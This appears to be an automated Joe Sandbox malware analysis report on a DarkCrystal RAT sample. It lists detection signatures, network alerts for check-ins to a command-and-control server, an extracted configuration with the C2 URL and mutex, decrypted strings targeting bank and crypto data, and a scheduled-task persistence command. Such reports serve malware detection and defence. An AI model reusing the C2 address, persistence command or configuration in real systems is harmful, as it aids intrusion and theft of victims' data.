Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe", ParentImage: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ParentProcessId: 3536, ParentProcessName: ComwebDriverbroker.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline", ProcessId: 6080, ProcessName: csc.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /f, CommandLine: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 5044, ParentProcessName: dllhost.exe, ProcessCommandLine: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /f, ProcessId: 3416, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T10:22:28.318519+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49738	104.21.67.152	80	TCP
2024-12-26T10:23:02.812170+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49819	104.21.67.152	80	TCP
2024-12-26T10:23:12.515322+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49839	104.21.67.152	80	TCP
2024-12-26T10:23:15.859065+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49846	104.21.67.152	80	TCP
2024-12-26T10:23:22.452843+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49863	104.21.67.152	80	TCP
2024-12-26T10:23:41.265439+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49907	104.21.67.152	80	TCP
2024-12-26T10:23:51.062331+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49929	104.21.67.152	80	TCP
2024-12-26T10:23:54.359277+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49937	104.21.67.152	80	TCP
2024-12-26T10:24:00.624926+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49949	104.21.67.152	80	TCP
2024-12-26T10:24:26.468745+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49993	104.21.67.152	80	TCP
2024-12-26T10:24:35.609559+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49994	104.21.67.152	80	TCP
2024-12-26T10:24:38.500025+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49996	104.21.67.152	80	TCP
2024-12-26T10:24:44.812770+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49997	104.21.67.152	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4t8f8F3uT1.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\Default\Pictures\smss.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://lopatasovka.ru/generatordlePublic", "MUTEX": "DCR_MUTEX-PDpnNMPNDj96r52VRbvY", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	ReversingLabs: Detection: 73%
Source: C:\Users\Default\Pictures\smss.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\aRvfEXBg.log	ReversingLabs: Detection: 25%
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: 4t8f8F3uT1.exe	Virustotal: Detection: 56%			Perma Link
Source: 4t8f8F3uT1.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\Default\Pictures\smss.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Joe Sandbox ML: detected
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ubytutlp.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IxkHGSFL.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 4t8f8F3uT1.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"True"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
Source: 00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-PDpnNMPNDj96r52VRbvY","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBXbTFHYzJNeVZXbE1RMGw2U1dwdmFXUklTakZhVTBselNXcFJhVTlwU2pCamJsWnNTV2wzYVU1VFNUWkpibEo1WkZkVmFVeERTVEpKYW05cFpFaEtNVnBUU1hOSmFtTnBUMmxLYlZsWGVIcGFVMGx6U1dwbmFVOXBTakJqYmxac1NXbDNhVTlUU1RaSmJsSjVaRmRWYVV4RFNYaE5RMGsyU1c1U2VXUlhWV2xNUTBsNFRWTkpOa2x1VW5sa1YxVnBURU5KZUUxcFNUWkpibEo1WkZkVmFVeERTWGhOZVVrMlNXNVNlV1JYVldsTVEwbDRUa05KTmtsdVVubGtWMVZwWmxFOVBTSmQiXQ=="]
Source: 00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://lopatasovka.ru/","generatordlePublic"]]

Source: 4t8f8F3uT1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\dllhost.exe			Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\5940a34987c991			Jump to behavior

Source: 4t8f8F3uT1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4t8f8F3uT1.exe
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.pdb source: ComwebDriverbroker.exe, 00000005.00000002.2229743508.00000000039FE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.pdb source: ComwebDriverbroker.exe, 00000005.00000002.2229743508.00000000039FE000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0069A69B
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_006AC220
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006BB348 FindFirstFileExA,	0_2_006BB348

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49839 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49846 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49738 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49907 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49819 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49863 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49949 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49929 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49937 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49997 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49993 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49994 -> 104.21.67.152:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49996 -> 104.21.67.152:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: powershell.exe, 00000024.00000002.3359890859.0000014AAA703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3445591527.00000193122F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3078434828.0000026A10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3425463860.00000206978A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3440208986.00000260EDED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000024.00000002.2351681023.0000014A9A8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.00000193024A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DE087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ComwebDriverbroker.exe, 00000005.00000002.2229743508.00000000039FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351681023.0000014A9A691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.0000019302281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DDE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000024.00000002.2351681023.0000014A9A8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.00000193024A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DE087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.3608464962.0000026A69740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000027.00000002.3640207978.0000026A69A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.osoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).
Source: powershell.exe, 00000024.00000002.2351681023.0000014A9A691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.0000019302281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DDE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.3359890859.0000014AAA703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3445591527.00000193122F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3078434828.0000026A10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3425463860.00000206978A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3440208986.00000260EDED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_00696FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00696FAA

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP

Jump to behavior

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069848E	0_2_0069848E
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006940FE	0_2_006940FE
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A00B7	0_2_006A00B7
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A4088	0_2_006A4088
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A7153	0_2_006A7153
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006B51C9	0_2_006B51C9
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006932F7	0_2_006932F7
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A62CA	0_2_006A62CA
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A43BF	0_2_006A43BF
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069F461	0_2_0069F461
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006BD440	0_2_006BD440
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069C426	0_2_0069C426
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A77EF	0_2_006A77EF
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069286B	0_2_0069286B
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006BD8EE	0_2_006BD8EE
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006C19F4	0_2_006C19F4
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069E9B7	0_2_0069E9B7
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A6CDC	0_2_006A6CDC
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006A3E0B	0_2_006A3E0B
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069EFE2	0_2_0069EFE2
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006B4F9A	0_2_006B4F9A
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD348A0D78	5_2_00007FFD348A0D78
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD34D17692	5_2_00007FFD34D17692
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD34D0CC95	5_2_00007FFD34D0CC95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD3489945D	39_2_00007FFD3489945D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD348985FA	39_2_00007FFD348985FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD348985D3	39_2_00007FFD348985D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD34895BFA	39_2_00007FFD34895BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD349630E9	39_2_00007FFD349630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD34960E82	39_2_00007FFD34960E82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD3489604D	39_2_00007FFD3489604D

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: String function: 006AEC50 appears 56 times
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: String function: 006AEB78 appears 39 times
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: String function: 006AF5F0 appears 31 times

Source: 4t8f8F3uT1.exe, 00000000.00000003.2140362478.0000000002912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs 4t8f8F3uT1.exe
Source: 4t8f8F3uT1.exe, 00000000.00000002.2140919163.0000000002912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs 4t8f8F3uT1.exe
Source: 4t8f8F3uT1.exe, 00000000.00000003.2139676013.0000000002912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs 4t8f8F3uT1.exe
Source: 4t8f8F3uT1.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4t8f8F3uT1.exe

Source: 4t8f8F3uT1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ComwebDriverbroker.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SIUNRHqHRVexch.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SIUNRHqHRVexch.exe0.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Idle.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: smss.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dllhost.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@75/58@0/0

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_00696C74 GetLastError,FormatMessageW,

0_2_00696C74

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_006AA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_006AA6C2

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

File created: C:\Program Files\Windows Security\BrowserCore\dllhost.exe

Jump to behavior

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

File created: C:\Users\user\Desktop\aRvfEXBg.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_03
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-PDpnNMPNDj96r52VRbvY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

File created: C:\Users\user\AppData\Local\Temp\wt3mav0l

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcomSurrogateRefSession\b85BZX0R6chhd0.bat" "

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Command line argument: sfxname	0_2_006ADF1E
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Command line argument: sfxstime	0_2_006ADF1E
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Command line argument: STARTDLG	0_2_006ADF1E
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Command line argument: xzn	0_2_006ADF1E

